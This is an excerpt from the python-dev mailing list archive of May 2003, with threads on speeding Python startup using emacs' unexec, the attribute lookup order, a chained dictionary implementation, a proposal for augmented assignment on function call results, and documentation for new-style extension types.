> user    0m0.110s
> sys     0m0.010s
> $ strace -e open ./python -c 'import cgi' 2>&1 | grep -v ENOENT | wc -l
>      88
> $ ./python dump.py cgipython -_ssl cgi
> $ time ./cgipython -c 'import cgi' # best 'real' of 5 runs
> real    0m0.039s
> user    0m0.020s
> sys     0m0.020s
> $ strace -e open ./cgipython -c 'import cgi' 2>&1 | grep -v ENOENT | 
> wc -l
>       9
> $ ./python dump.py dython
> -rwxrwxr-x    1 jepler   jepler    4983713 May 18 19:42 cgipython
> -rwxrwxr-x    1 jepler   jepler    3603737 May 18 19:39 python
> -rwxrwxr-x    1 jepler   jepler    4541345 May 18 19:55 dython
>
> (a minimal unexec'd python is about 90k bigger than the regular Python
> binary)
>
> I'm running the test suite now .. it hangs in test_signal for some 
> reason.
> test_thread seems to hang too, which may be related.  (but 
> test_threading
> completes?)
>
> $ ./dython Lib/test/regrtest.py -x test_signal -x test_thread
> [...]
> 225 tests OK.
> 26 tests skipped:
>     test_aepack test_al test_bsddb3 test_bz2 test_cd test_cl
>     test_curses test_email_codecs test_gl test_imgfile
>     test_linuxaudiodev test_macfs test_macostools test_nis
>     test_normalization test_ossaudiodev test_pep277 test_plistlib
>     test_scriptpackages test_socket_ssl test_socketserver
>     test_sunaudiodev test_timeout test_urllibnet test_winreg
>     test_winsound
> 1 skip unexpected on linux2:
>     test_bz2
>
> Well, if it worked right it'd sure be interesting.  OTOH, unexelf.c is
> GPL'd and there's also the nightmare of different unex* for different
> platforms.
>
>
Like I said, xemacs has a "portable" undumper.
--Dan



From aahz@pythoncraft.com  Mon May 19 02:58:22 2003
From: aahz@pythoncraft.com (Aahz)
Date: Sun, 18 May 2003 21:58:22 -0400
Subject: [Python-Dev] Attribute lookup (was Re: python-dev Summary for 2003-05-01 through 2003-05-15)
In-Reply-To: <3EC83590.1000306@ocf.berkeley.edu>
References: <3EC83590.1000306@ocf.berkeley.edu>
Message-ID: <20030519015822.GA10320@panix.com>

[Normally I send my corrections to Brett privately, but since I'm taking
a whack at attribute lookup, I figured this ought to be public.]

On Sun, May 18, 2003, Brett C. wrote:
>
> The only thing I would like help with this summary is if someone knows 
> the attribute lookup order (instance, class, class descriptor, ...) off 
> the top of their heads, can you let me know?  If not I can find it out 
> by going through the docs but I figure someone out there has to know it 
> by heart and any possible quirks (like whether descriptors take 
> precedence over non-descriptor attributes).

This gets real tricky.  For simple attributes of an instance, the order
is instance, class/type, and base classes of the class/type (but *not*
the metaclass).  However, method resolution of the special methods goes
straight to the class.  Finally, if an attribute is found on the
instance, a search goes through the hierarchy to see whether a set
descriptor overrides (note specifically that it's a set descriptor;
methods are implemented using get descriptors).

I *think* I have this right, but I'm sure someone will correct me if I'm
wrong.

>     LookupError exists and subclasses both IndexError and KeyError. 
> Rather handy when you don't care whether you are dealing with a list or 
> dictionary but do care if what you are looking for doesn't exist.
>     os.walk also gained a parameter argument called onerror that takes 
> a function that will be passed any exception raised by os.walk as it 
> does its thing; previously os.walk ignored all errors.

"and has as subclasses"
-- 
Aahz (aahz@pythoncraft.com)           <*>         http://www.pythoncraft.com/

"In many ways, it's a dull language, borrowing solid old concepts from
many other languages & styles:  boring syntax, unsurprising semantics,
few automatic coercions, etc etc.  But that's one of the things I like
about it."  --Tim Peters on Python, 16 Sep 93


From greg@cosc.canterbury.ac.nz  Mon May 19 03:05:16 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 19 May 2003 14:05:16 +1200 (NZST)
Subject: Unifying modules and classes? (Re: [Python-Dev] a strange case)
In-Reply-To: <200305161345.25415.troy@gci.net>
Message-ID: <200305190205.h4J25GJ27449@oma.cosc.canterbury.ac.nz>

Troy Melhase <troy@gci.net>:

> Just last night, it occurred to me that modules could be made callable via 
> subclassing. "Why in the world would you want callable modules you ask?"

This has given me a thought concerning the naming problem that arises
when you have a module (e.g. socket) that exists mainly to hold a
single class. What if there were some easy way to make the class and
the module the same thing?

I'm thinking about having an alternative filename suffix, such as
".cls", whose contents is treated as though it were inside a class
statement, and then the resulting class is put into sys.modules as
though it were a module.

Not sure how you'd specify base classes -- maybe a special
__bases__ class attribute or something.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From pje@telecommunity.com  Mon May 19 03:18:43 2003
From: pje@telecommunity.com (Phillip J. Eby)
Date: Sun, 18 May 2003 22:18:43 -0400
Subject: [Python-Dev] Attribute lookup (was Re: python-dev Summary
 for 2003-05-01 through 2003-05-15)
In-Reply-To: <20030519015822.GA10320@panix.com>
References: <3EC83590.1000306@ocf.berkeley.edu>
 <3EC83590.1000306@ocf.berkeley.edu>
Message-ID: <5.1.0.14.0.20030518220635.01f09ce0@mail.telecommunity.com>

At 09:58 PM 5/18/03 -0400, Aahz wrote:
>[Normally I send my corrections to Brett privately, but since I'm taking
>a whack at attribute lookup, I figured this ought to be public.]
>
>On Sun, May 18, 2003, Brett C. wrote:
> >
> > The only thing I would like help with this summary is if someone knows
> > the attribute lookup order (instance, class, class descriptor, ...) off
> > the top of their heads, can you let me know?  If not I can find it out
> > by going through the docs but I figure someone out there has to know it
> > by heart and any possible quirks (like whether descriptors take
> > precedence over non-descriptor attributes).
>
>This gets real tricky.  For simple attributes of an instance, the order
>is instance, class/type, and base classes of the class/type (but *not*
>the metaclass).  However, method resolution of the special methods goes
>straight to the class.  Finally, if an attribute is found on the
>instance, a search goes through the hierarchy to see whether a set
>descriptor overrides (note specifically that it's a set descriptor;
>methods are implemented using get descriptors).
>
>I *think* I have this right, but I'm sure someone will correct me if I'm
>wrong.

Here's the algorithm in a bit more detail:

1. First, the class/type and its bases are searched, checking dictionaries 
only.

2. If the object found is a "data descriptor"  (i.e. has a type with a 
non-null tp_descr_set pointer, which is closely akin to whether the 
descriptor has a '__set__' attribute), then the data descriptor's __get__ 
method is invoked.

3. If the object is not found, or not a data descriptor, the instance 
dictionary is checked.  If the attribute isn't in the instance dictionary, 
then the descriptor's __get__ method is invoked (assuming a descriptor was 
found).

4. Invoke __getattr__ if present.

(Note that replacing __getattribute__ *replaces* this entire algorithm.)

Also note that special methods are *not* handled specially here.  The 
behavior Aahz is referring to is that slots (e.g. tp_call) on new-style 
types do not retrieve an instance attribute; they are based purely on 
class-level data.  So, although you *can* override the values in an 
instance, they have no effect on the class behavior.  E.g.:

 >>> class Foo(object):
         def __call__(self,*args):
                 print "foo",args


 >>> f=Foo()
 >>> f.__call__ = 'spam'
 >>> f.__call__
'spam'
 >>> f()
foo ()
 >>>

Notice that the behavior of the instance '__call__' attribute does not 
affect the class-level definition of '__call__'.

To recast the algorithm as a precedence order:

1. Data descriptors (ones with tp_descr_set/__set__) found in the type 
__mro__  (note that this includes __slots__, property(), and custom 
descriptors)

2. Instance attributes found in ob.__dict__

3. Non-data descriptors, such as methods, or any other object found in the 
type __mro__ under that name

4. __getattr__
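
A small illustration of rules 1-3 (the names are made up); writing straight 
into ob.__dict__ sidesteps the descriptor's __set__, so we can see which 
lookup wins:

    class Desc(object):
        # a data descriptor: defines both __get__ and __set__
        def __get__(self, obj, objtype=None):
            return "from descriptor"
        def __set__(self, obj, value):
            raise AttributeError("read-only")

    class C(object):
        data = Desc()                # data descriptor in the type
        def method(self):            # plain function: a non-data descriptor
            return "from class"

    c = C()
    c.__dict__["data"] = "instance value"
    c.__dict__["method"] = lambda: "instance value"

    print c.data        # "from descriptor" -- rule 1 beats rule 2
    print c.method()    # "instance value"  -- rule 2 beats rule 3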




From jepler@unpythonic.net  Mon May 19 03:46:18 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Sun, 18 May 2003 21:46:18 -0500
Subject: Using emacs' unexec to speed Python startup (was Re: [Python-Dev] Startup time)
In-Reply-To: <20030519012212.GA10317@unpythonic.net>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]> <1052927757.7258.38.camel@slothrop.zope.com> <3EC51B5C.2080307@lemburg.com> <16069.13640.892428.185711@montanaro.dyndns.org> <1053112171.2342.7.camel@barry> <20030519012212.GA10317@unpythonic.net>
Message-ID: <20030519024618.GB10317@unpythonic.net>

On Sun, May 18, 2003 at 08:22:14PM -0500, Jeff Epler wrote:
> I'm running the test suite now .. it hangs in test_signal for some reason.  
> test_thread seems to hang too, which may be related.  (but test_threading
> completes?)

If I make another change, to call PyOS_InitInterrupts just after
Py_Initialize in Modules/main.c, these two tests pass.

Py_Initialize believes it's already initialized so returns without doing
anything.  But unexec doesn't preserve signal handlers, so this must be
re-done explicitly.

Jeff


From barry@wooz.org  Mon May 19 04:28:08 2003
From: barry@wooz.org (Barry Warsaw)
Date: Sun, 18 May 2003 23:28:08 -0400
Subject: Using emacs' unexec to speed Python startup (was Re: [Python-Dev] Startup time)
In-Reply-To: <20030519024618.GB10317@unpythonic.net>
Message-ID: <E904818D-89A9-11D7-B165-003065EEFAC8@wooz.org>

On Sunday, May 18, 2003, at 10:46 PM, Jeff Epler wrote:

> On Sun, May 18, 2003 at 08:22:14PM -0500, Jeff Epler wrote:
>> I'm running the test suite now .. it hangs in test_signal for some 
>> reason.
>> test_thread seems to hang too, which may be related.  (but 
>> test_threading
>> completes?)
>
> If I make another change, to call PyOS_InitInterrupts just after
> Py_Initialize in Modules/main.c, these two tests pass.
>
> Py_Initialize believes it's already initialized so returns without 
> doing
> anything.  But unexec doesn't preserve signal handlers, so this must be
> re-done explicitly.

Y'know, I wrote that as a joke, and it's quite FAST that you've taken it 
and made it real.  Very cool too, congrats!

Since it looks like you implemented the meat of it as a module, I 
wonder if it couldn't be cleaned up (with the interrupt reset either 
pulled into the extension or exposed to Python) and added to Python 2.3?

-Barry



From barry@python.org  Mon May 19 04:57:00 2003
From: barry@python.org (Barry Warsaw)
Date: Sun, 18 May 2003 23:57:00 -0400
Subject: [Python-Dev] test_bsddb185 failing under OS X
In-Reply-To: <16070.45480.640314.144944@montanaro.dyndns.org>
Message-ID: <F13FC8F7-89AD-11D7-B165-003065EEFAC8@python.org>

Yee haw!  All expected tests pass for me w/ Python 2.3cvs on OSX 10.2.6.

Gonna try Python 2.2.3 next.

-Barry



From barry@python.org  Mon May 19 08:04:02 2003
From: barry@python.org (Barry Warsaw)
Date: Mon, 19 May 2003 03:04:02 -0400
Subject: [Python-Dev] test_bsddb185 failing under OS X
In-Reply-To: <F13FC8F7-89AD-11D7-B165-003065EEFAC8@python.org>
Message-ID: <12146C5B-89C8-11D7-B165-003065EEFAC8@python.org>

On Sunday, May 18, 2003, at 11:57 PM, Barry Warsaw wrote:

> Yee haw!  All expected tests pass for me w/ Python 2.3cvs on OSX 
> 10.2.6.
>
> Gonna try Python 2.2.3 next.

Looks good.
-Barry



From dmorton@bitfurnace.com  Mon May 19 09:32:32 2003
From: dmorton@bitfurnace.com (damien morton)
Date: Mon, 19 May 2003 04:32:32 -0400
Subject: [Python-Dev] Simple dicts
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEPHEFAB.tim.one@comcast.net>
Message-ID: <000001c31de1$322a0e90$6401a8c0@damien>

Well, I implemented the chained dict, and against stock 2.3b1 I am
seeing about a 4-5% speedup on pystone, and about a 10-15% speedup on a
simplistic largedict benchmark which inserts 200K strings, retrieves
them once, and then removes them one at a time. Suggestions for more
appropriate benchmarks are, as usual, always welcome. (raymond - if you
have a suite of benchmarks specifically for dicts, I would love to have
access to them). Move-to-front chains are implemented, and a benchmark
that exercised skewed access patterns would be great.
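
(For readers who want the idea rather than the C, here is a toy Python
sketch of chaining with move-to-front; it is only an illustration and does
not model the dictentry/first-pointer layout or the ratios described below.)

class ChainedDict(object):
    # Toy separate-chaining table; each bucket is a linked list of
    # [key, value, next] nodes.  A successful lookup moves the hit
    # node to the front of its chain.
    def __init__(self, nbuckets=16):
        self.buckets = [None] * nbuckets

    def __setitem__(self, key, value):
        b = hash(key) % len(self.buckets)
        node = self.buckets[b]
        while node is not None:
            if node[0] == key:
                node[1] = value
                return
            node = node[2]
        self.buckets[b] = [key, value, self.buckets[b]]

    def __getitem__(self, key):
        b = hash(key) % len(self.buckets)
        prev, node = None, self.buckets[b]
        while node is not None:
            if node[0] == key:
                if prev is not None:            # move-to-front
                    prev[2] = node[2]
                    node[2] = self.buckets[b]
                    self.buckets[b] = node
                return node[1]
            prev, node = node, node[2]
        raise KeyError(key)

d = ChainedDict()
d["spam"] = 1
print d["spam"]     # prints 1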

Memory usage is more than the current implementation, but is highly
tunable. You can adjust the ratio of dictentry structs to first
pointers. My simple largedict benchmark performed best with an 8:16
ratio, while the pystone benchmark performed best with a 6:16 ratio.
Moving up to a 100:16 ratio on the largedict benchmark adversely affected
performance by about 10%. It may pay off to schedule the sparsity ratio
according to the size of the dict. Also, because performance and memory
usage vary roughly linearly with sparsity, it may be a less dangerous
candidate for being user settable. Where fail-fast characteristics are
required, sparsity may be highly desirable.

I need to address Tim's concerns about the poor hash function used for
python integers, but I think this can be addressed easily enough. I
would welcome some guidance about what hash functions need to be
addressed though. Is it just integers? (there's a great article on
integer hash functions at www.cris.com/~Ttwang/tech/inthash.htm)

If anyone wants to try out the code, please download
www.bitfurnace.com/python/dict.zip

I'm still trying to get the above code to pass the regression tests. Most
things go smoothly, but some tests throw out this kind of error:
"unknown scope for self in test_len(103) in C:\Documents and
Settings\Administrator\Desktop\python\Python-2.3b1\lib\test\test_builtin
.py
symbols: {}
locals: {}
globals: {}
"
Still trying to track down the source of this error. No idea why
symbols, locals and globals would all be empty at this point though.

Comments, suggestions, etc welcome.

- Damien Morton



From lkcl@samba-tng.org  Mon May 19 10:08:11 2003
From: lkcl@samba-tng.org (Luke Kenneth Casson Leighton)
Date: Mon, 19 May 2003 09:08:11 +0000
Subject: [Python-Dev] [PEP] += on return of function call result
In-Reply-To: <20030517152137.GA25579@unpythonic.net>
References: <20030402090726.GN1048@localhost> <yu99n0j9gdas.fsf@europa.research.att.com> <20030515214417.GF3900@localhost> <yu99vfwbf62s.fsf@europa.research.att.com> <20030516142451.GI6196@localhost> <20030517152137.GA25579@unpythonic.net>
Message-ID: <20030519090811.GB737@localhost>

hiya jeff,

on radio 4 today there was a discussion about art - what makes
people go "wow" instead of being shocked.  seeing the byte code
in front of my eyes isn't so much of a shock, more of a "wow"
because i have at some point in my past actually _looked_ at the
python sources stack machine, for investigating parallelising it
(!!!!!)


okay.

how do i run the examples you list?  dis.dis(f) gives an
"unrecognised variablename dis".

okay.  let's give this a shot.


Script started on Mon May 19 08:44:19 2003
lkcl@highfield:~$ python O
Python 2.2.2 (#1, Jan 18 2003, 10:18:59) 
[GCC 3.2.2 20030109 (Debian prerelease)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import dis
>>> def g(): return f(x)
... 
>>> dis.dis(g)
          0 LOAD_GLOBAL              0 (f)
          3 LOAD_GLOBAL              1 (x)
          6 CALL_FUNCTION            1
          9 RETURN_VALUE        
         10 LOAD_CONST               0 (None)
         13 RETURN_VALUE        
>>> def g(): f(x)
... 
>>> dis.dis(g)
          0 LOAD_GLOBAL              0 (f)
          3 LOAD_GLOBAL              1 (x)
          6 CALL_FUNCTION            1
          9 POP_TOP             
         10 LOAD_CONST               0 (None)
         13 RETURN_VALUE        
>>> 
lkcl@highfield:~$ exit

Script done on Mon May 19 08:44:56 2003


right.

the difference between these two is the POP_TOP.

so, the return result is placed on the stack, from the call to
f(x).

so... if there's instead an f(x) += 1 instead of f(x), then
the result is going to be pushed onto the top of the stack,
followed by the += 1, followed at the end by a POP_TOP.

if the result is used (e.g. assigned to a variable),

x = f(x) += 1

then you don't do the POP_TOP.


... am i missing something?


what am i missing?

that it's not known what type of variable is returned, therefore
you're not certain as to what type of STORE to use?


Script started on Mon May 19 08:51:22 2003
lkcl@highfield:~$ python -O
Python 2.2.2 (#1, Jan 18 2003, 10:18:59) 
[GCC 3.2.2 20030109 (Debian prerelease)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> def f(): return 5
... 
>>>     def g(): 
...     x = f() + 1
...     return x
... 
>>> import dis
>>> dis.dis(g)
          0 LOAD_GLOBAL              0 (f)
          3 CALL_FUNCTION            0
          6 LOAD_CONST               1 (1)
          9 BINARY_ADD          
         10 STORE_FAST               0 (x)
         13 LOAD_FAST                0 (x)
         16 RETURN_VALUE        
         17 LOAD_CONST               0 (None)
         20 RETURN_VALUE        
>>> 
lkcl@highfield:~$ 
Script done on Mon May 19 08:52:40 2003


okay...  soo.... you get an assignment into a variable...
...

okay, i think i see what the problem is.

because the return result _may_ not be used, you don't know
what type of STORE to use?


or, because there are optimisations added, it's not always
possible to "pass down" the right kind of STORE_xxx to
the previous stack level?



i believe you may be thinking that this is more complex than
it is.  that's very patronising of me.  scratch that.

i believe this should not be complex :)


"+=" itself is a function call with two arguments and a return
result, where the return result is the first argument.

it just _happens_ that that function call has been drastically
optimised - with its RETURN_VALUE removed; STORE_xxx removed.


more thought needed.  i'll go look at some code.

l.

p.s. 10 and 13 in the 8:52:40am typescript above look like they
could be optimised / removed.

p.p.s. yes i _have_ written a stack-machine optimiser before.




On Sat, May 17, 2003 at 10:21:39AM -0500, Jeff Epler wrote:
> I think that looking at the generated bytecode is useful.
> 
> # Running with 'python -O'
> >>> def f(x): x += 1
> >>> dis.dis(f)
>           0 LOAD_FAST                0 (x)
>           3 LOAD_CONST               1 (1)
>           6 INPLACE_ADD         
>           7 STORE_FAST               0 (x)    ***
>          10 LOAD_CONST               0 (None)
>          13 RETURN_VALUE        
> >>> def g(x): x[0] += 1
> >>> dis.dis(g)
>           0 LOAD_GLOBAL              0 (x)
>           3 LOAD_CONST               1 (0)
>           6 DUP_TOPX                 2
>           9 BINARY_SUBSCR       
>          10 LOAD_CONST               2 (1)
>          13 INPLACE_ADD         
>          14 ROT_THREE           
>          15 STORE_SUBSCR                      ***
>          16 LOAD_CONST               0 (None)
>          19 RETURN_VALUE        
> >>> def h(x): x.a += 1
> >>> dis.dis(h)
>           0 LOAD_GLOBAL              0 (x)
>           3 DUP_TOP             
>           4 LOAD_ATTR                1 (a)
>           7 LOAD_CONST               1 (1)
>          10 INPLACE_ADD         
>          11 ROT_TWO             
>          12 STORE_ATTR               1 (a)    ***
>          15 LOAD_CONST               0 (None)
>          18 RETURN_VALUE        
> 
> In each case, there's a STORE step to the inplace statement.  In the case of the proposed
> 	def j(x): x() += 1
> what STORE instruction would you use?
> 
> >>> [opname for opname in dis.opname if opname.startswith("STORE")]
> ['STORE_SLICE+0', 'STORE_SLICE+1', 'STORE_SLICE+2', 'STORE_SLICE+3',
>  'STORE_SUBSCR', 'STORE_NAME', 'STORE_ATTR', 'STORE_GLOBAL', 'STORE_FAST',
>  'STORE_DEREF']
> 
> If you don't want one from the list, then you're looking at substantial
> changes to Python.. (and STORE_DEREF probably doesn't do anything that's
> relevant to this situation, though the name sure sounds promising,
> doesn't it)
> 
> Jeff

-- 
-- 
expecting email to be received and understood is a bit like
picking up the telephone and immediately dialing without
checking for a dial-tone; speaking immediately without listening
for either an answer or ring-tone; hanging up immediately and
then expecting someone to call you (and to be able to call you).
--
every day, people send out email expecting it to be received
without being tampered with, read by other people, delayed or
simply - without prejudice but lots of incompetence - destroyed.
--
please therefore treat email more like you would a CB radio
to communicate across the world (via relaying stations):
ask and expect people to confirm receipt; send nothing that
you don't mind everyone in the world knowing about...


From Paul.Moore@atosorigin.com  Mon May 19 10:36:27 2003
From: Paul.Moore@atosorigin.com (Moore, Paul)
Date: Mon, 19 May 2003 10:36:27 +0100
Subject: [Python-Dev] Re: C new-style classes and GC
Message-ID: <16E1010E4581B049ABC51D4975CEDB880113DB01@UKDCX001.uk.int.atosorigin.com>

From: Jim Fulton [mailto:jim@zope.com]
> You can read the documentation for it here:

> http://www.python.org/dev/doc/devel/ext/defining-new-types.html

Just looking at this, I note the "Note" at the top. The way
this reads, it implies that details of how things used to work
have been removed. I don't know if this is true, but I'd prefer
if it wasn't.

People upgrading their extensions would find the older
information useful (actually, an "Upgrading from the older API"
section would be even nicer, but that involves more work...)
Having to refer to an older copy of the documentation (which they
may not even have installed) could tip the balance between "lets
keep up to date" and "if it works, don't fix it".

Heck, I still have some code I wrote for the 1.4 API which still
works. I've never got round to upgrading it, on the basis that
someone might be using it with 1.5 still. But when I do, I'd
dump pre-2.2 support, so *I* have no use for "older" documentation
except to find out what all that old code meant... :-)

If the old information is still there, maybe it's just the tone
of the note that should be changed.

Paul.


From jim@zope.com  Mon May 19 11:30:04 2003
From: jim@zope.com (Jim Fulton)
Date: Mon, 19 May 2003 06:30:04 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <16E1010E4581B049ABC51D4975CEDB880113DB01@UKDCX001.uk.int.atosorigin.com>
References: <16E1010E4581B049ABC51D4975CEDB880113DB01@UKDCX001.uk.int.atosorigin.com>
Message-ID: <3EC8B22C.2070109@zope.com>

Moore, Paul wrote:
> From: Jim Fulton [mailto:jim@zope.com]
> 
>>You can read the documentation for it here:
> 
> 
>>http://www.python.org/dev/doc/devel/ext/defining-new-types.html
> 
> 
> Just looking at this, I note the "Note" at the top. The way
> this reads, it implies that details of how things used to work
> has been removed. I don't know if this is true, but I'd prefer
> if it wasn't.

The section has been rewritten. The examples are quite different
than they used to be. There's no way to document the old and new
ways together without:

- Making this a lot more confusing, and

- violating the "one way to do it" in Python rule.


> People upgrading their extensions would find the older
> information useful (actually, an "Upgrading from the older API"
> section would be even nicer, but that involves more work...)
> Having to refer to an older copy of the documentation (which they
> may not even have installed) could tip the balance between "lets
> keep up to date" and "if it works, don't fix it".

In general, I'd say that if the old extensions aren't broke, don't
fix them.  If someone *is* going to go through the trouble to update
them, then I think they can manage to get the old docs.

Further, if you have written an old extension, you probably already
know the old way to define types, so you don't need the old docs.

> Heck, I still have some code I wrote for the 1.4 API which still
> works. I've never got round to upgrading it, on the basis that
> someone might be using it with 1.5 still. But when I do, I'd
> dump pre-2.2 support, so *I* have no use for "older" documentation
> except to find out what all that old code meant... :-)
> 
> If the old information is still there, maybe it's just the tone
> of the note that should be changed.

The old information is not still there.  I'm not gonna add it back,
because it would make the document far more confusing.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (703) 361-1714            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org



From dmorton@bitfurnace.com  Mon May 19 12:29:56 2003
From: dmorton@bitfurnace.com (damien morton)
Date: Mon, 19 May 2003 07:29:56 -0400
Subject: [Python-Dev] Simple dicts
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEPHEFAB.tim.one@comcast.net>
Message-ID: <000201c31df9$f9e39650$6401a8c0@damien>

Not so simple after all, or maybe too simple.

My 'simple' largedict test was simplistic and flawed, and a more
thorough test shows a slowdown on large dicts. I was inserting,
accessing, and deleting the keys without randomising the order, and once
randomised, cache effects kicked in. The slowdown isn't too huge though.

Further testing against small dicts shows a much larger slowdown.

The 5% improvement in pystone results still stands, but I think the main
reason for the improvement is that I had inlined some fail-fast tests
into ceval.c

Oh well, back to the drawing board.




From jepler@unpythonic.net  Mon May 19 13:06:36 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Mon, 19 May 2003 07:06:36 -0500
Subject: Using emacs' unexec to speed Python startup (was Re: [Python-Dev] Startup time)
In-Reply-To: <E904818D-89A9-11D7-B165-003065EEFAC8@wooz.org>
References: <20030519024618.GB10317@unpythonic.net> <E904818D-89A9-11D7-B165-003065EEFAC8@wooz.org>
Message-ID: <20030519120633.GA12073@unpythonic.net>

On Sun, May 18, 2003 at 11:28:08PM -0400, Barry Warsaw wrote:
> Since it looks like you implemented the meat of it as a module, I 
> wonder if it couldn't be cleaned up (with the interrupt reset either 
> pulled into the extension or exposed to Python) and added to Python 2.3?

First off, I sure doubt that this feature could be truly made
"non-experimental" before 2.3 is released.  There was one "strange bug" so
far (the signal thing), though that was quickly solved (with another
change to the core Python source code).

Secondly, forcing all allocations to come from the heap instead of mmap'd
space may hurt performance.

Thirdly, the files implementing unexec itself, which come from fsf emacs,
are covered by the GNU GPL, which I think makes them unsuitable for
compiling into Python. (There's something called "dynodump" in Emacs that
appears to apply to ELF binaries which bears this license:
 * This source code is a product of Sun Microsystems, Inc. and is provided
 * for unrestricted use provided that this legend is included on all tape
 * media and as a part of the software program in whole or part.  Users
 * may copy or modify this source code without charge, but are not authorized
 * to license or distribute it to anyone else except as part of a product or
 * program developed by the user.
I wish I understood what "except as part of a product or program developed
by the user" meant--does that mean that Alice can't download Python
then give it to Bob if it includes dynodump?  After all, Alice didn't
develop it, she simply downloaded it.  The other dumpers in xemacs
seem to be GPL, and I think that the "portable undump" mentioned by
another poster is a placeholder for a project that isn't written yet:
http://www.xemacs.org/Architecting-XEmacs/unexec.html)

Fourthly, we'd have to duplicate whatever machinery chooses the correct
unexec implementation for the platform you're running on---there are lots to
choose from:
	unexaix.c     unexconvex.c  unexenix.c     unexnext.c    unexw32.c
	unexalpha.c   unexec.c      unexhp9k800.c  unexsni.c
	unexapollo.c  unexelf.c     unexmips.c     unexsunos4.c
(Of course, it's well known that only elf and win32 matter in these modern
times)

I'd be excited to see "my work" in Python, though the fact of the matter
is that I just tried this out because I was bored on a Sunday afternoon.

Jeff


From lkcl@samba-tng.org  Mon May 19 13:53:17 2003
From: lkcl@samba-tng.org (Luke Kenneth Casson Leighton)
Date: Mon, 19 May 2003 12:53:17 +0000
Subject: [Python-Dev] [PEP] += on return of function call result
In-Reply-To: <20030517152137.GA25579@unpythonic.net>
References: <20030402090726.GN1048@localhost> <yu99n0j9gdas.fsf@europa.research.att.com> <20030515214417.GF3900@localhost> <yu99vfwbf62s.fsf@europa.research.att.com> <20030516142451.GI6196@localhost> <20030517152137.GA25579@unpythonic.net>
Message-ID: <20030519125317.GC737@localhost>

jeff,

beat bolli's code example:

	count[word] = count.get(word, 0) + 1

i think best illustrates what issue you are trying to raise.

okay, we know there are two issues so let's give an example
that removes one of those issues:

	count = {}

	count[word] = count.get(word, []) + ['hello']

the issue is that the difference between the above 'hello'
example and this:

	count.get(word, []) += ['hello']

is that you don't know what STORE to use after the use of get()
in the second example, but you do in the first example because
it's explicitly set out.
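
(for the record, the in-place effect is already spellable today when the
value is a mutable list -- a small sketch, not a proposal:

	lst = count.setdefault(word, [])   # store [] if missing, return the stored list
	lst += ['hello']                   # list.__iadd__ mutates in place, so the
	                                   # dict's value is updated too

but that only works because lists mutate in place; it doesn't answer the
STORE question in the general case.)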

so, does this help illustrate what might be done?

if it's possible to return a result and know what should be done
with it, then surely it should be possible to return a result from
a += "function" and know what should be done with it?

l.



On Sat, May 17, 2003 at 10:21:39AM -0500, Jeff Epler wrote:
> I think that looking at the generated bytecode is useful.
> 
> # Running with 'python -O'
> >>> def f(x): x += 1
> >>> dis.dis(f)
>           0 LOAD_FAST                0 (x)
>           3 LOAD_CONST               1 (1)
>           6 INPLACE_ADD         
>           7 STORE_FAST               0 (x)    ***
>          10 LOAD_CONST               0 (None)
>          13 RETURN_VALUE        
> >>> def g(x): x[0] += 1
> >>> dis.dis(g)
>           0 LOAD_GLOBAL              0 (x)
>           3 LOAD_CONST               1 (0)
>           6 DUP_TOPX                 2
>           9 BINARY_SUBSCR       
>          10 LOAD_CONST               2 (1)
>          13 INPLACE_ADD         
>          14 ROT_THREE           
>          15 STORE_SUBSCR                      ***
>          16 LOAD_CONST               0 (None)
>          19 RETURN_VALUE        
> >>> def h(x): x.a += 1
> >>> dis.dis(h)
>           0 LOAD_GLOBAL              0 (x)
>           3 DUP_TOP             
>           4 LOAD_ATTR                1 (a)
>           7 LOAD_CONST               1 (1)
>          10 INPLACE_ADD         
>          11 ROT_TWO             
>          12 STORE_ATTR               1 (a)    ***
>          15 LOAD_CONST               0 (None)
>          18 RETURN_VALUE        
> 
> In each case, there's a STORE step to the inplace statement.  In the case of the proposed
> 	def j(x): x() += 1
> what STORE instruction would you use?
> 
> >>> [opname for opname in dis.opname if opname.startswith("STORE")]
> ['STORE_SLICE+0', 'STORE_SLICE+1', 'STORE_SLICE+2', 'STORE_SLICE+3',
>  'STORE_SUBSCR', 'STORE_NAME', 'STORE_ATTR', 'STORE_GLOBAL', 'STORE_FAST',
>  'STORE_DEREF']
> 
> If you don't want one from the list, then you're looking at substantial
> changes to Python.. (and STORE_DEREF probably doesn't do anything that's
> relevant to this situation, though the name sure sounds promising,
> doesn't it)
> 
> Jeff

-- 
-- 
expecting email to be received and understood is a bit like
picking up the telephone and immediately dialing without
checking for a dial-tone; speaking immediately without listening
for either an answer or ring-tone; hanging up immediately and
then expecting someone to call you (and to be able to call you).
--
every day, people send out email expecting it to be received
without being tampered with, read by other people, delayed or
simply - without prejudice but lots of incompetence - destroyed.
--
please therefore treat email more like you would a CB radio
to communicate across the world (via relaying stations):
ask and expect people to confirm receipt; send nothing that
you don't mind everyone in the world knowing about...


From barry@python.org  Mon May 19 14:09:59 2003
From: barry@python.org (Barry Warsaw)
Date: Mon, 19 May 2003 09:09:59 -0400
Subject: Using emacs' unexec to speed Python startup (was Re: [Python-Dev] Startup time)
In-Reply-To: <20030519120633.GA12073@unpythonic.net>
Message-ID: <31A13D92-89FB-11D7-B165-003065EEFAC8@python.org>

On Monday, May 19, 2003, at 08:06 AM, Jeff Epler wrote:

> First off, I sure doubt that this feature could be truly made
> "non-experimental" before 2.3 is released.  There was one "strange 
> bug" so
> far (the signal thing), though that was quickly solved (with another
> change to the core Python source code).

Yeah, I was just tired and rambling after a long weekend. :)

Still, cool stuff!
-Barry



From skip@pobox.com  Mon May 19 15:24:54 2003
From: skip@pobox.com (Skip Montanaro)
Date: Mon, 19 May 2003 09:24:54 -0500
Subject: [Python-Dev] Simple dicts
